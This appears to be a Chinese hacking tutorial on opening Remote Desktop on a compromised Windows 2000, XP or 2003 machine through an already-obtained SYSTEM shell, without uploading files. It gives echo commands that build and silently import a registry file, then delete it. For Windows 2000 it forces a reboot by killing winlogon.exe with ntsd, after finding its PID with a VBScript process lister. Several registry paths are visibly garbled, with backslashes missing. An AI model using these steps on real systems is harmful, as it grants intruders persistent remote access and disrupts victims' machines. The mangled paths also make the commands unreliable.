不須上傳任何文件開啟終端的方法適合win2k,xp,2003.

　　本文前提是已經(jīng)通過某種方法得到了對方的一個SYSTEM權(quán)限的CMDSHELL~~

　　在無須傳任何文件的情況下開啟終端服務(wù)。

　　一、win 2k下終端開啟終端

　　首先用ECHO寫一個3389.reg文件,然后導(dǎo)入到注冊表，echo代碼如下：

　　echo Windows Registry Editor Version 5.00 >>3389.reg

　　echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion etcache] >>3389.reg

　　echo "Enabled"="0" >>3389.reg

　　echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] >>3389.reg

　　echo "ShutdownWithoutLogon"="0" >>3389.reg

　　echo [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller] >>3389.reg

　　echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg

　　echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server] >>3389.reg

　　echo "TSEnabled"=dword:00000001 >>3389.reg

　　echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD] >>3389.reg

　　echo "Start"=dword:00000002 >>3389.reg

　　echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService] >>3389.reg

　　echo "Start"=dword:00000002 >>3389.reg

　　echo [HKEY_USERS.DEFAULTKeyboard LayoutToggle] >>3389.reg

　　echo "Hotkey"="1" >>3389.reg

　　echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWds dpwdTds cp] >>3389.reg

　　echo "PortNumber"=dword:00000D3D >>3389.reg

　　echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] >>3389.reg

　　echo "PortNumber"=dword:00000D3D >>3389.reg

　　把這些ECHO代碼到CMDSHELL下貼粘就可以生成3389.reg文件，接著regedit /s 3389.reg導(dǎo)入注冊表。

　　(如果要改變終端端口只須把上面的兩個D3D都改一下就可以了)

　　因為win 2k下開終端不能像XP一樣可以立即生效,而是需重啟機器后才生效。

　　一個簡單的辦法就是用ntsd.exe(win 2k以上自帶的命令)結(jié)束一個重要的進程就可以實現(xiàn)機器重啟了??！

　　比如結(jié)束winlogon.exe,lsass.exe也可以但結(jié)束后會跳出重啟倒計時(不太好~)

　　winlogon.exe被關(guān)閉后機器立刻強制重啟了

　　命令執(zhí)行格式為ntsd -c q -p PID

　　那如何知道winlogon.exe的PID進程號呢~

　　以下這個腳本可以列舉當(dāng)前所有進程的PID：

　　wscript.echo "PID　 ProcessName"

　　for each ps in getobject("winmgmts:\. ootcimv2:win32_process").instances_

　　wscript.echo ps.handle&vbtab&ps.name

　　next

　　在CMDSHELL窗口下貼上如下ECHO代碼就可以得到查看進程PID的腳本1.vbe：

　　echo wscript.echo "PID　 ProcessName">>1.vbe

　　echo for each ps in getobject("winmgmts:\. ootcimv2:win32_process").instances_ >>1.vbe

　　echo wscript.echo ps.handle^&vbtab^&ps.name>>1.vbe

　　echo next>>1.vbe

　　生成1.vbe后請檢查一下echo出來的腳本是否有錯(才四行，對一下上面給出的就可以了)。

　　運行1.vbe得到如下運行結(jié)果：

　　C:WINNTsystem32>cscript 1.vbe

　　cscript 1.vbe

　　Microsoft (R) Windows 腳本宿主版本 5.1 for Windows

　　版權(quán)所有(C) Microsoft Corporation 1996-1999. All rights reserved.

　　PID　 ProcessName

　　0　　 System Idle Process

　　8　　 System

　　152　 smss.exe

　　180　 csrss.exe

　　200　 winlogon.exe

　　228　 services.exe

　　240　 lsass.exe

　　424　 svchost.exe

　　472　 spoolsv.exe

　　512　 msdtc.exe

　　616　 svchost.exe

　　628　 KAVSvc.EXE

　　660　 llssrv.exe

　　692　 nvsvc32.exe

　　728　 regsvc.exe

　　748　 MSTask.exe

　　776　 alter.exe

　　900　 svchost.exe

　　916　 WinMgmt.exe

　　1088　 Dfssvc.exe

　　484　 Explorer.EXE

　　1444　 mdm.exe

　　1340　 Server.exe

　　1224　 ibguard.exe

　　1252　 KAVSvcUI.EXE

　　1256　 ibserver.exe

　　1336　 internat.exe

　　1204　 Uspds.exe

　　720　 bar.exe

　　1288　 dllhost.exe

　　1580　 inetinfo.exe

　　1672　 cmd.exe

　　1464　 pppoe.exe

　　1704　 regedit.exe

　　316　 cscript.exe

　　從上面可以看出當(dāng)前winlogon.exe的PID號為200運行命令ntsd -c q -p 200 (這里的200要替換為winlogon.exe進程對就的PID啦)過會兒機器馬

　　上重啟了(ntsd.exe是WIN自帶的可用來結(jié)束任意級別進程)等著收獲吧~~

　　二、winxp和win2003終端開啟

　　開啟的REG文件代碼如下：

　　Windows Registry Editor Version 5.00

　　[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

　　"fDenyTSConnections"=dword:00000000

　　[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWds dpwdTds cp]

　　"PortNumber"=dword:00000D3D

　　[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp]

　　"PortNumber"=dword:00000D3D

　　用以下ECHO代碼寫一個REG文件：

　　echo Windows Registry Editor Version 5.00>>3389.reg

　　echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]>>3389.reg

　　echo "fDenyTSConnections"=dword:00000000>>3389.reg

　　echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWds dpwdTds cp]>>3389.reg

　　echo "PortNumber"=dword:00000d3d>>3389.reg

　　echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp]>>3389.reg

　　echo "PortNumber"=dword:00000d3d>>3389.reg

　　regedit /s 3389.reg

　　del 3389.reg

　　這樣xp和2003開啟終端是不用重啟的如果你想改端口只需把上面的兩個PortNumber對應(yīng)的D3D改成相應(yīng)十進制數(shù)的十六進制形式就可以了！用計算器轉(zhuǎn)換吧。XP下不論開終端還是改終端端口都不需重啟，真是太妙了~~呵呵。如果要關(guān)閉終閉只需把"fDenyTSConnections"=dword:00000000

　　改成"fDenyTSConnections"=dword:00000001